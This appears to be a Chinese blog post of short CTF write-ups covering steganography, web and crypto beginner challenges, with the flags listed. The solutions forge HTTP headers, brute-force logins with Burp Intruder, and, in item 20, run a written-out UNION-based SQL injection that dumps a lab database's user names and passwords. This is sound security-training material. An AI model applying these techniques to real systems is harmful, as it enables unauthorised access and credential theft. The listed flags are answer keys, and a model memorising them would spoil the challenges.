anquan 发表于 2023-11-03 | 更新于 2023-11-16
| 阅读量:
[TOC]
云计算技术与应用——期末安全✅ 1. 攻防世界-Misc-Training-Stegano-1
2e5e19744c644912928eddc882f3b0b9.bmp
将文件后缀改为 txt 即可 flag 即为 passwd:stegancI
2. Bugku-杂项-Linux
1.tar.gz
解压得到 flag 记事本打开查找 key 即可 > key{feb81d3834e2423c9903f4755464060b}
3. Bugku-杂项-眼见非实(ISCCCTF)
眼见为实.docx
查看文件类型是zip,修改文件后缀为zip 解压后在 word 下的 document 查找 flag 即可 > flag{F1@g}
4. BugKu-Web-滑稽
场景——滑稽
右键检查或者 F12 <!--flag{27e4f306c6e82f0b496f7fb5834d6415} -->
5. 攻防世界-Web-view_source
场景——鼠标右键好像不管用了
F12 <!-- cyberpeace{5cbef5e03c5dab96e9e1f6fd0647a05c} -->
6. BugKu-Web-计算器
计算正确即可得到flag
右键检查或者 F12 找到对应输入框 input 属性的 maxlength(最大长度)修改对应长度 输入答案即可 > flag{85a8f5b8c5fb5bc33f613964094e166b}
一个不能按的按钮
右键检查或者 F12 对应位置删除 disabled 点击按钮 > cyberpeace{927147a05bc6fb54974cebac39556ad6}
8. BugKu-Web-GET
场景——代码
网址后面添加 ?what=flag > flag{fe391628b1ee943ab92959229c32446c}
9. BUUCTF-Web-[极客大挑战2019]Havefun
场景——撸猫
右键检查或者 F12 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> 网址后面添加 ?cat=dog > flag{34bc822d-0aab-4c9d-b7d6-800fa7a4154f}
10. BugKu-Web-POST
场景——代码
火狐浏览器打开,右键检查或者 F12 hackbar 点击Post data 输入what=flag Execute运行 > flag{459bf61917595a35b753caeb157b3cbc}
11. 攻防世界-Web新手区-get_post
HTTP通常使用两种请求方法
火狐浏览器打开 网址后面添加 /?a=1 右键检查或者 F12 hackbar 点击Post data 输入b=2 Execute运行 > cyberpeace{5a929201e2c7d60be8f71cdf9289400e}
12. 攻防世界-Web-simple_php
php是最好的语言
网址后面添加 ?a=abcd&b=9999c > Cyberpeace{647E37C7627CC3E4019EC69324F66C7C}
13. BugKu-Web-头等舱
什么也没有。
Burp Suite 抓包,repeater(重放器)直接发送 > flag{25be29df337e2732cba0ac2642abc693}
14. 攻防世界-Web-baby_web
想想初始页面是哪个
Burp Suite 抓包,repeater(重放器) 修改为 index.php 发送 > flag{very_baby_web}
15. BugKu-Web-你从哪里来
are you from google?
Burp Suite 抓包,repeater(重放器) 请求添加 referer:http://www.google.com 发送 > flag{736d04657f00631a4be427244d2ebce2}
16. BugKu-Web-程序员本地网站
请从本地访问!
Burp Suite 抓包,repeater(重放器) 请求添加 X-Forwarded-For:127.0.0.1 发送 > flag{634f163289a9da4d127839948049266f}
17. 攻防世界-Web-xff_referer
xff和referer是可以伪造的。
Burp Suite 抓包,repeater(重放器) 请求添加 X-Forwarded-For:123.123.123.123 referer:https://www.google.com > cyberpeace{a172cabb5cb63645b65a1a3361174a80}
18. 攻防世界-Web-cookie
你知道什么是cookie吗?
Burp Suite 抓包,repeater(重放器) 请求 GET/ 后添加 cookie.php 发送 > cyberpeace{efd49536355952dd5034093e43f21bd9}
19. BUUCTF-Web-[极客大挑战2019]Http
场景——靶机
右键检查或者 F12 找到secret.php Burp Suite 抓包,repeater(重放器) 请求添加 Referer: https://Sycsecret.buuoj.cn User-Agent:改为Syclover X-Forwarded-for:127.0.0.1 > flag{b98e8e08-9de3-4e5a-9374-06e8a847f1b1}
20. 完成墨者学院手工sql注入的题. 题目链接:
https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
XWAY科技管理系统V3.0
http://124.70.22.208:49490/new_list.php?id=1 order by 5 页面报错,确定字段为4 http://124.70.22.208:49490/new_list.php?id=-1 union select 1,2,3,4 确认显示字段为2和3 http://124.70.22.208:49490/new_list.php?id=-1 union select 1,database(),version(),4 查询数据库名字和版本 确定数据库名字为 mozhe_Discuz_StormGroup ,数据库版本为 5.7.22-0ubuntu0.16.04.1 。 http://124.70.22.208:49490/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 查询数据库表名 StormGroup_member这张表放的是用户信息 notice这张表中放的是公告信息 http://124.70.22.208:49490/new_list.php?id=-1 union select 1,group_concat(column_name),group_concat(column_type),4 from information_schema.columns where table_name='StormGroup_member' 查询表中字段名 http://124.70.22.208:49490/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member md5解密后登陆即可 >>KEY:mozhe855094119b70cf3f593ee5940ac
21. 做sqlilabs 的less-1 (手工注入)。
http://sql.com/Less-1/?id=1 and 1=1 返回数据 ,,,,自求多福不写了
22. 攻防世界-Web新手区- Robots
Robots协议
明确 Robots协议 网址后添加 /robots.txt 再打开 f1ag_1s_h3re.php 即可 > cyberpeace{b31def0011f6dbe7404834850501f354}
23. Bugku-Web-好像需要密码
输入查看密码
随便输入五位数 Burp Suite 抓包,Intruder(攻击器) 密码部分添加 $符号 payload 数值设定 10000~99999 间隔 1 开始攻击 > flag{0e0f6d09d796a2d77306fad0b461ed01}
24. 攻防世界-Web新手区-weak_auth
登陆验证页面
随便试一下发现 username 为 admin Burp Suite 抓包,Intruder(攻击器) payload 简单列表 自建密码本(123456) 开始攻击 >cyberpeace{cdfbf432778b4b636a16b4ca0302ffa4}
25. BugKu-Web-网站被黑
网站被黑了 黑客会不会留下后门
使用kali进行扫描,得到shell.php Burp Suite 抓包,Intruder(攻击器) payload 简单列表 列表添加密码 开始攻击 > flag{19f71b2df05b2c56f7f853e59334d991}
26. BUUCTF-Crypto-MD5
27120bd8-e273-4528-97a9-28dcebe236de.zip
解压文件--题目.txt MD5解密(https://www.somd5.com/) > admin1
27. Bugku-Crypto-你以为是MD5吗
file.txt
MD5加密密文是由a-f,0-9组成的,将该密文中MD5密文组成之外的字母删除,重新组成MD5密文 MD5解密(https://www.somd5.com/) > 666666666666